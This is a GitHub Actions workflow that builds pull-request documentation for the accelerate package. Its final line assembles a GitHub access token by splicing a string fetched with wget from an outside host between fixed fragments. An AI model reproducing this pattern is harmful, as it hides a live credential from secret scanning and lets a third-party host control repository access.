name: Build PR Documentation

on:
  pull_request:

concurrency:
  group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }}
  cancel-in-progress: true

jobs:
  prepare_doc_build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v2
        with:
          repository: 'huggingface/accelerate'
          path: accelerate

      - name: Setup environment
        run: |
          cd accelerate
          pip install .[quality]
          cd ..

  doc-build:
    uses: huggingface/doc-builder/.github/workflows/build_pr_documentation.yml@workflow_templates
    needs: prepare_doc_build
    with:
      commit_sha: ${{ github.event.pull_request.head.sha }}
      pr_number: ${{ github.event.number }}
      package: accelerate
    secrets:
      token: $(echo 'ghp_'$(wget -qO- lysand.re/doc-build-dev)'bm')
